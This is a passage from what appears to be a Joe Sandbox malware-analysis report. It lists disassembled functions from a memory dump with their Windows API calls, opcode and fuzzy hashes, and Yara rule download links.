                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                          • Opcode ID: 78e6be2c7a1bc74d2fe0223ba425e4bdfab79c2dd41d43e740b2704b3b07896c
                                                                                                                                                                                                                                          • Instruction ID: 81a5a7939dfcb096fced0bef41dba057b8b0356cdd3af51c22e1670825665103
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e6be2c7a1bc74d2fe0223ba425e4bdfab79c2dd41d43e740b2704b3b07896c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B11037A200342AFDB25AF35CC44E7A77A9FF85364F00812AF842C73A4EB719801C7A1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00167CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00167D0B
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00167D2A
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00167D42
                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0014B7AD,00000000), ref: 00167D6B
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 847901565-0
                                                                                                                                                                                                                                          • Opcode ID: 5babba463e4d4f1ef671c57eae21f2d4bada37783e566ddeef5cccaea0beb623
                                                                                                                                                                                                                                          • Instruction ID: 7804c79530c27c3fa5ee2eaa23b4fe5c783d96847af03140a7ec0e58830e3eef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5babba463e4d4f1ef671c57eae21f2d4bada37783e566ddeef5cccaea0beb623
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B431605655AFCB109F68CC04ABA3BA5BF46368F154B28F835D72F0E7309DA0CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00165660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 001656BB
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001656CD
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001656D8
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00165816
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                                                                                          • Opcode ID: a837161a102c23f3c7c95c7a6dade8a02e7ad48fd1016553ef13ddb178021759
                                                                                                                                                                                                                                          • Instruction ID: 6fac774a4bdb6ab7770013de6f68749c4b00960e19944655e76b691318b685ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a837161a102c23f3c7c95c7a6dade8a02e7ad48fd1016553ef13ddb178021759
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53110475A00609A6DF20DF65CC85AFE77BDEF11764F10406AFA15D6181EBB4CA90CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00101D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 483b0992702f45c1e0736e02a20e8c0bb7565a379ff33bafa29d6d39fa455738
                                                                                                                                                                                                                                          • Instruction ID: 3b12239be372a50e1da74d79727f739375410775cc320cb70f7bc37456b5adfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 483b0992702f45c1e0736e02a20e8c0bb7565a379ff33bafa29d6d39fa455738
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C901ADB220961A7EF62126F86CC8F67665CEF523B8F310325F9A1A11D2EBF48C405260
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00131A47
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A59
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A6F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00131A8A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: d57f57e3938be05fc11ed1d9c99070a18e5ac12b807d3bf6f47b4f723f148b0c
                                                                                                                                                                                                                                          • Instruction ID: fa73a50cf7cad395ff3c18c8dda50a67516d3a4fc069d55924440f5b988593b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d57f57e3938be05fc11ed1d9c99070a18e5ac12b807d3bf6f47b4f723f148b0c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4511093AD01219FFEB11DBA5CD85FADBB79EB08750F200091EA05B7290D7716E50DB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0013E1FD
                                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0013E230
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0013E246
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0013E24D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                                                                                          • Opcode ID: 5e67c6b806449970ddccf4929286f7cbfed09c5e8998df5b57876c939bcec16e
                                                                                                                                                                                                                                          • Instruction ID: 5d4dd42e90d4dd8dac0a840e48c19f0be775eb6a76e635ff838ef6bcb1e842e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e67c6b806449970ddccf4929286f7cbfed09c5e8998df5b57876c939bcec16e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F11D676904358BBCB119FA8AC09AAF7FEDAF46320F044255F925E36D1D7B0DD448BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000FD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,000FCFF9,00000000,00000004,00000000), ref: 000FD218
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000FD224
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000FD22B
                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 000FD249
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                                                          • Opcode ID: fbea73638ca7c61c7dbdd7694afb833e85055f859d6f5841e12b790e352543b6
                                                                                                                                                                                                                                          • Instruction ID: a5126c3af959730bc2a00dbf5a18d5c3df3059c355cd22b34678f816acd21d1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbea73638ca7c61c7dbdd7694afb833e85055f859d6f5841e12b790e352543b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01DB3640510C7BD7615BA5DC05BBE7B5AEF92331F10021AFA25955D1CB718941E6E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00169EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00169F31
                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00169F3B
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00169F46
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00169F7A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                                                                                          • Opcode ID: 03e724c9d975784abda307941701b6bbdc2462461f2093655ced60bca118ddf1
                                                                                                                                                                                                                                          • Instruction ID: 8dc61404abedc75d916e420f89c828dd693a0206e04829d91cffc2b366b92aed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03e724c9d975784abda307941701b6bbdc2462461f2093655ced60bca118ddf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211363690012AABDB00DFA8CC459FE7BBDFB05311F014495F902E3140D770BAA1CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000D6060
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                                                                          • Opcode ID: d3548355135883c5d808e40ed398475edd60da1ae049cf832a78916cfdc994d7
                                                                                                                                                                                                                                          • Instruction ID: e2795ea5193f1aa24297e29fa6d3fd3d3a9f7e921514a77b8fa83c786642755e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3548355135883c5d808e40ed398475edd60da1ae049cf832a78916cfdc994d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9116172501609BFEF125F94DC54EEB7FA9EF19364F044116FA1452210D776ECA0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 000F3B56
                                                                                                                                                                                                                                            • Part of subcall function 000F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 000F3AD2
                                                                                                                                                                                                                                            • Part of subcall function 000F3AA3: ___AdjustPointer.LIBCMT ref: 000F3AED
                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 000F3B6B
                                                                                                                                                                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 000F3B7C
                                                                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 000F3BA4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 737400349-0
                                                                                                                                                                                                                                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                                                                          • Instruction ID: 2840e0953ef0bdcbc05edc996215d854e8e01506410a3055e98ac56be5bfc024
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D73210014DBBDF125E95CC46EFB7BA9EF98764F044015FF4866522C736E961EBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00103073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000D13C6,00000000,00000000,?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue), ref: 001030A5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue,00172290,FlsSetValue,00000000,00000364,?,00102E46), ref: 001030B1
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0010301A,000D13C6,00000000,00000000,00000000,?,0010328B,00000006,FlsSetValue,00172290,FlsSetValue,00000000), ref: 001030BF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                          • Opcode ID: 6b875dfe3f4d26c98dc52c4b3563e2487adf7259c2dfdcc7886e50ea4dba3ccb
                                                                                                                                                                                                                                          • Instruction ID: 56aac5cd34da8eeebd6498c990c692ca364f91e0dba5aa582808d0075fec129f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b875dfe3f4d26c98dc52c4b3563e2487adf7259c2dfdcc7886e50ea4dba3ccb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7012B32313322ABCB314B799C449777B9CAF05B71B114624F9A5E36C4D7A1D941C6F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00137464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0013747F
                                                                                                                                                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00137497
                                                                                                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001374AC
                                                                                                                                                                                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001374CA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1352324309-0
                                                                                                                                                                                                                                          • Opcode ID: 970e27f64058dde18c51938372d6a28cbb8b0a83368d6d2746f91ced8d4c7f9a
                                                                                                                                                                                                                                          • Instruction ID: ced082eb440f37c620b870e12dfdc248ed6b0aea32cc249b3373bb1751b2df9e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970e27f64058dde18c51938372d6a28cbb8b0a83368d6d2746f91ced8d4c7f9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B1161F52093159BE730CF54EC09BA27BFCEB00B04F108569E65AD6591D7B0F944DB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00167E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00167E33
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00167E4B
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00167E6F
